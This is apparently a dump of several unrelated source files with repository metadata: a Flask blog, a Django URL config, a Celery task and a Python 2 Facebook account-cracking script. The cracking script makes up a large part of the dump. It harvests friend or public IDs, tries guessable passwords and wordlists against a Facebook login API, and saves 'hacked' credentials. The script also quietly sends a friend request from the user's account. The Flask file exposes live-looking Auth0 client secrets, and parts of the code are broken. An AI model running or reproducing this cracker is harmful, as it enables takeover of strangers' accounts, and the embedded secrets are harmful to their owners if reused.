from .auth.auth import requires_auth, AuthError
# from flaskblog.auth import AuthError, requires_auth
# db.create_all()
posts = [
{
'author': 'Corey Schafer',
'title': 'Blog Post 1',
'content': 'First post content',
'date_posted': 'April 20, 2018'
},
{
'author': 'Jane Doe',
'title': 'Blog Post 2',
'content': 'Second post content',
'date_posted': 'April 21, 2018'
}
]
@app.route("/")
@app.route("/home")
def home():
return render_template('home.html', posts=posts)
@app.route("/about")
def about():
return render_template('about.html', title='About')
# native registration supported
@app.route("/register", methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
flash(f'Account created for {form.username.data}!', 'success')
return redirect(url_for('home'))
return render_template('register.html', title='Register', form=form)
# @app.route("/login", methods=['GET', 'POST'])
# def login():
# form = LoginForm()
# if form.validate_on_submit():
# if form.email.data == 'admin@blog.com' and form.password.data == 'password':
# flash('You have been logged in!', 'success')
# return redirect(url_for('home'))
# else:
# flash('Login Unsuccessful. Please check username and password', 'danger')
# return render_template('login.html', title='Login', form=form)
@app.route('/login')
def login():
# # redirect_uri = url_for('authorize', _external=True)
return auth0.authorize_redirect(redirect_uri='http://localhost:5000/callback')
###########test###########
# import http.client
# conn = http.client.HTTPSConnection("coffestack.us.auth0.com")
# payload = "{\"client_id\":\"KoJK3ZANDBUo3MqQ89kuJDihHyorWMHG\",\"client_secret\":\"KdhzQGTwrFongHpHutXt40YPKTi5CmIqeQ0bVgR54UvlvMPTrucW7SsCmSo1loSp\",\"audience\":\"blog\",\"grant_type\":\"client_credentials\"}"
# headers = {'content-type': "application/json"}
# conn.request("POST", "/oauth/token", payload, headers)
# res = conn.getresponse()
# data = res.read()
# print(data.decode("utf-8"))
@app.route('/logout')
def logout():
    """Clear the local Flask session and render the logout page."""
    # Clear session stored data
    session.clear()
    # Redirect user to logout endpoint
    # NOTE(review): `params` is built but never used -- the Auth0 logout
    # redirect (returnTo + client_id) appears unfinished; confirm whether
    # the provider-side session should also be terminated here.
    params = {'returnTo': url_for('home', _external=True),
              'client_id': 'kfrmwrB4PMIsXz3ZxWl07tVNGejZQZgW'}
    return render_template('logout.html',
                           userinfo=None,
                           userinfo_pretty=None, indent=4)
@ app.route('/dashboard')
@ auth.requires_auth()
def dashboard():
return render_template('dashboard.html',
userinfo=session['profile'],
userinfo_pretty=json.dumps(session['jwt_payload'], indent=4))
oauth = OAuth(app)
auth0 = oauth.register(
'auth0',
client_id='kfrmwrB4PMIsXz3ZxWl07tVNGejZQZgW',
client_secret='EXS6SuDnxzclxF9qK_4BdgN58HsCxTPIiQ3HEvsNTDEGk2vczatJy-l3svPZwg4r',
api_base_url='https://coffestack.us.auth0.com',
access_token_url='https://coffestack.us.auth0.com/oauth/token',
authorize_url='https://coffestack.us.auth0.com/authorize',
client_kwargs={
'scope': 'openid profile email',
},
)
# /server.py
# Here we're using the /callback route.
@ app.route('/callback')
def callback_handling():
    """Auth0 OAuth callback: exchange the auth code for tokens and cache
    the user's profile in the Flask session."""
    # Handles response from token endpoint
    auth0.authorize_access_token()
    resp = auth0.get('userinfo')
    userinfo = resp.json()

    # Store the user information in flask session.
    session['jwt_payload'] = userinfo
    # Minimal profile used elsewhere (e.g. by /dashboard and /post/new).
    session['profile'] = {
        'user_id': userinfo['sub'],
        'name': userinfo['name'],
        'picture': userinfo['picture']
    }
    # Debug output left in by the author; remove before production.
    print('session')
    print(session)
    # print(session['profile'])
    return redirect('/')
@app.route('/post/new', methods=['GET', 'POST'])
# @auth.requires_auth()
def new_post():
    """Create a new blog post; requires a logged-in session."""
    form = PostForm()
    # BUG FIX: Flask's `session` is a dict-like proxy and is never None,
    # so the original `if session is None:` guard could not fire and the
    # final render would raise KeyError for anonymous users. Guard on the
    # logged-in profile key instead (set by /callback).
    if 'profile' not in session:
        flash('Your need to login', 'error')
        return redirect(url_for('home'))
    if form.validate_on_submit():
        title = request.form['title']
        content = request.form['content']
        message = Post(title=title, content=content)
        db.session.add(message)
        db.session.commit()
        flash('Your Post has been Created!', 'success')
        return redirect(url_for('home'))
    return render_template('create_post.html', title='New Post', form=form, userinfo=session['profile'])
| [
"Amajimoda@bob-2.local"
] | Amajimoda@bob-2.local |
9e95bff67fee864bd8a59334a7809bc25385125f | 0032cbd2d47227620083d3b963fc76e9045e733e | /ENV/bin/easy_install | 192569c2a025cd6b5a1a529e7dc59f8e4f1031a4 | [] | no_license | xiangzhuyuan/python-getting-started | 38397a0b3339c3e184251c110c8da2abe035be66 | 30456abaa7bcbec0dd84e1037fae7de520c7e54e | refs/heads/master | 2020-04-08T16:19:42.006471 | 2015-03-13T10:28:22 | 2015-03-13T10:28:22 | 32,149,683 | 0 | 0 | null | 2015-03-13T10:25:15 | 2015-03-13T10:25:15 | Python | UTF-8 | Python | false | false | 288 | #!/Users/zhuyuan.xiang/workspace/python-getting-started/ENV/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # Console-script shim for setuptools' easy_install (generated into the
    # virtualenv's bin/): strip the Windows launcher suffixes
    # ('-script.pyw' / '.exe') from argv[0], then delegate to easy_install.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"xiangzhuyuan@gmail.com"
] | xiangzhuyuan@gmail.com | |
93af07926b81a28d66ba3b60bbd5a801aaf3a4f8 | f572f48682e4efebac8d5102e51cb62da5caa7c9 | /geekshop/urls.py | d1799be21a399ea0cfd29e1cb128918a101a7363 | [] | no_license | cheef78/Django_basic | 4ac9c6fdcd9dc8775e16fe01c7c8799e207a22dc | 1e6771265769ce4a6295953d97c5c78ed2a3737b | refs/heads/master | 2023-04-11T12:54:45.085481 | 2021-03-13T11:04:04 | 2021-03-13T11:04:04 | 342,874,905 | 0 | 0 | null | 2021-04-25T21:37:13 | 2021-02-27T14:24:24 | CSS | UTF-8 | Python | false | false | 1,329 | py | """geekshop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from mainapp import views as mainapp
urlpatterns = [
    path('', mainapp.main, name = 'main'),
    path('products/', mainapp.products, name = 'products'),
    path('contact/', mainapp.contact, name = 'contact'),
    # NOTE(review): every category route below maps to the same `products`
    # view with no distinguishing argument — presumably the view should
    # branch on a URL parameter or the route name; confirm.
    path('products/all', mainapp.products, name = 'products_all'),
    path('products/home', mainapp.products, name = 'products_home'),
    path('products/modern', mainapp.products, name = 'products_modern'),
    path('products/office', mainapp.products, name = 'products_office'),
    path('products/classic', mainapp.products, name = 'products_classic'),
    path('admin/', admin.site.urls, name = 'admin'),
]
| [
"suslovoleg@mail.ru"
] | suslovoleg@mail.ru |
b2617614628599bfb4b9f00487c546159e392f55 | e663909cec3c4eda12bb705fce9a6dc901bb7d88 | /爬虫/day12 celery/案例/定时任务的使用/tasks.py | 4c40c0aff2ac3b0e98d732cc5040744ae7ff06b3 | [] | no_license | 1284753334/learning2 | a03f293965a652883503cae420d8b1ad11ae6661 | f2fcb3c856656cc8427768b41add3ee083487592 | refs/heads/master | 2023-01-30T23:18:26.951210 | 2020-12-20T15:57:18 | 2020-12-20T15:57:18 | 315,065,804 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | from celery import Celery
from celery import Task
# Celery app: Redis DB 2 on localhost serves as both broker and result backend.
# NOTE(review): the Redis password is hard-coded in both URLs — better to read
# it from configuration or the environment.
app = Celery('tasks', backend='redis://:123456@127.0.0.1:6379/2',
             broker='redis://:123456@127.0.0.1:6379/2')
app.config_from_object('celery_config')  # periodic schedule etc. live in celery_config
@app.task(bind=True)
def period_task(self):
    """Demo periodic task: print its own task id (bind=True exposes self.request)."""
    print('period task done: {0}'.format(self.request.id))
# Start a worker:
# celery -A tasks worker -l info -P eventlet
# Start the beat scheduler (launched via a .bat file); scheduled tasks then run automatically:
# celery -A tasks beat
| [
"huapenghui@git.com"
] | huapenghui@git.com |
19ba8b35b07bdc9012a35b15b743cab393e138f8 | aff5b9799f52925318ab47dd8b35db57d8c0a5b6 | /untitled.txt | 08261242a88b5cdb918ff12d858a1ab555e014ae | [] | no_license | Fiaz420/Kalahacker | a2c416b29e0f347fce19548dd98edb3219e7000d | 6feaf27b8a55fa464c6ab7093c254082f3bbcb61 | refs/heads/main | 2023-05-14T02:01:56.760616 | 2021-05-25T06:49:05 | 2021-05-25T06:49:05 | 370,476,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,942 | txt | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
#### LOGO ####
logo = """
\033[1;91mGHURANI
\033[1;91m
\033[1;92mUpdated ⭐⚡
\033[1;92m
\033[1;93m
\033[1;93m
\033[1;93mGHURANI🔥╭╬──────────────────────────────────╬╮🔥
\033[0;94m ⚡ ✯ 𝕮𝖗𝖊𝖆𝖙𝖔𝖗 ✪ 𝕸𝖗. FIAZ ✬⚡
\033[0;94m ⚡ ✯ 𝖄𝖔𝖚𝖙𝖚𝖇𝖊 ✪ NOT ✬⚡
\033[0;97m ⚡ ✯ 𝕴𝖒 𝖓ø𝖙 𝖗𝖊𝖘𝖕𝖔𝖓𝖘𝖎𝖇𝖑𝖊 𝖋𝖔𝖗 𝖆𝖓𝖞 𝖒𝖎𝖘𝖘 𝖚𝖘𝖊 ✬⚡
\033[1;93m🔥╰╬──────────────────────────────────╬╯🔥 """
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97mGHURANI
\033[1;97mVIRSON 0.2⚡
\033[1;97mGHURANI
\033[1;97mGHURANI
\033[1;97mGHURANI
\033[1;97mGHURANI
jalan("\033[1;96m•◈•────────────•◈•\033[1;99mFIAZ\033[1;99m•◈•────────────•◈•")
jalan("\033[1;96m ___ _ __ __ _ ___ ___ ")
jalan("\033[1;96m / _/| | /__\ | \| || __|| _ \ CLONE ALL COUNTRY")
jalan("\033[1;96m| \__| |_| \/ || | ' || _| | v / ")
jalan("\033[1;96m \__/|___|\__/ |_|\__||___||_|_\ ")
jalan("\033[1;97m INDIAN USER USE ANY PROXY TO CLONE")
jalan("\033[1;97m WIFI USER USE ANY PROXY TO CLONE")
jalan("\033[1;93m Welcome to FIAZ Creations")
jalan("\033[1;96m•◈•──────────•◈•\033[1;96mKalaNiazi\033[1;96m•◈•──────────•◈•")
CorrectUsername = "Fiaz"
CorrectPassword = "Ghurani"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m📋 \x1b[1;95mENTER USER\x1b[1;97m»» \x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m🗝 \x1b[1;95mENTER PASSWORD\x1b[1;97m»» \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:RANA
time.sleep(2)
loop = 'false'
else:
print "\033[1;96mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "\033[1;96mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[⚡] \x1b[1;93mLogin your new id \x1b[1;93m[⚡]' )
id = raw_input('\033[1;963m[+] \x1b[0;34mEnter ID/Email \x1b[1;93m: \x1b[1;93m')
pwd = raw_input('\033[1;93m[+] \x1b[0;34mEnter Password \x1b[1;93m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Hogai'
os.system('xdg-open https://www.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear")
print logo
print " \033[1;36;40m ╔═════════════════════════════════╗"
print " \033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;33;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;36;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print " \033[1;36;40m ╚═════════════════════════════════╝"
print "\033[1;32;40m[1] \033[1;33;41mHack The World"
print "\033[1;32;40m[2] \033[1;33;42mUpdate FIAZ"
print "\033[1;32;40m[0] \033[1;33;43mLog out"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●════════════════════════◄►════════════════════════●\n"
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\x1b[1;32;40m[type1] \033[1;33;41mHack From Friend List"
print "\x1b[1;32;40m[type2] \033[1;33;42mHack From Public ID"
print "\x1b[1;32;40m[type3] \033[1;33;43mHack Bruteforce"
print "\x1b[1;32;40m[type4] \033[1;33;44mHack From File"
print "\x1b[1;32;40m[type0] \033[1;33;45mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
jalan('\033[1;93m[✺] Getting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;96m[*] Enter ID : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;40m[✺] Name : "+op["name"]
except KeyError:
print"\x1b[1;92m[✺] ID Not Found!"
raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
super()
print"\033[1;35;40m[✺] Getting IDs..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
brute()
elif peak =="4":
os.system('clear')
print logo
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;93m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;91m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' ⚡ ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' ⚡ ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' ⚡ ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' ⚡ ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' ⚡ ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' ⚡ ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' ⚡ ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;31;40m[✓] Process Has Been Completed\033[1;96m....'
print "\033[1;32;40m[+] Total OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;31;40m/\033[1;36;40m"+str(len(cekpoint))
print '\033[1;34;40m[+] CP File Has Been Saved : save/cp.txt'
print """
\033[1;31;40m ●════════════════════════◄►════════════════════════●
"""
raw_input("\n\033[1;96m[\033[1;97mExit\033[1;96m]")
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print "\033[1;36;40m ●════════════════════════◄►════════════════════════●"
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print """\n\x1b[1;91m[!] \x1b[1;92mLooks like you don't have a wordlist"""
super()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | Fiaz420.noreply@github.com |
d38154eb5737c5199a7f395ef72609068dab38b3 | 90bec950082b4c12c5ef96ff3aec07ac1c89e3be | /1.py | 544bf46e803586117686d6ba615f9ab4299d5945 | [] | no_license | kzhgun/coursera_py_hse | 2a3cbdddbe8f8d43cae5e4ce1ad553be212f1747 | 0884e446a419ed026d80532250870fd4d16f13c1 | refs/heads/master | 2022-11-15T10:13:19.478572 | 2020-07-08T18:55:41 | 2020-07-08T18:55:41 | 261,000,252 | 0 | 0 | null | 2020-05-03T19:14:37 | 2020-05-03T19:00:23 | Python | UTF-8 | Python | false | false | 273 | py | input()
a = list(map(float, input().split()))
n = int(input())
def func(a1):
    """Answer `n` range queries over `a1`, read from stdin.

    Each query line holds two 0-based inclusive indices ``q p``; the harmonic
